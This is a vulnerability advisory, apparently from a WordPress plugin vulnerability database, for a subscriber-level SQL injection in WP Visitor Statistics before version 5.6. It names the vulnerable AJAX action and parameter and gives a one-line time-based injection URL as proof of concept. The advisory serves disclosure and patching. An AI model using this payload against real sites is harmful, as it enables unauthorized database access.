WordPress Plugin Vulnerabilities

WP Visitor Statistics (Real Time Traffic) < 5.6 - Subscriber+ SQL Injection

Description

The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the refUrlDetails AJAX action, available to any authenticated user, leading to a SQL injection

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=refUrlDetails&id=sleep(1)%20--%20g

Affects Plugins

Fixed in 5.6

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-02-14 (about 2 years ago)
Added
2022-02-14 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other